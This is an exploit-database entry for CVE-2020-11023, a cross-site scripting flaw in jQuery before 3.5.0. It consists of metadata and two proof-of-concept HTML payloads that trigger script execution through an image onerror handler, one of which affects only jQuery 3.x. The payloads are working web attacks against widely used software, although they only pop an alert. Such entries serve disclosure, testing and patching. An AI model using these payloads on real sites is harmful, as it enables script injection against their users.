jQuery 1.0.3 - Cross-Site Scripting (XSS)

EDB-ID:

49767




Platform:

Multiple

Date:

2021-04-14


# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
# CVE : CVE-2020-11023

# Proof of Concept 1:
<style><style /><img src=x onerror=alert(1)>

# Proof of Concept 2 (Only jQuery 3.x affected):
<img alt="<x" title="/><img src=x onerror=alert(1)>">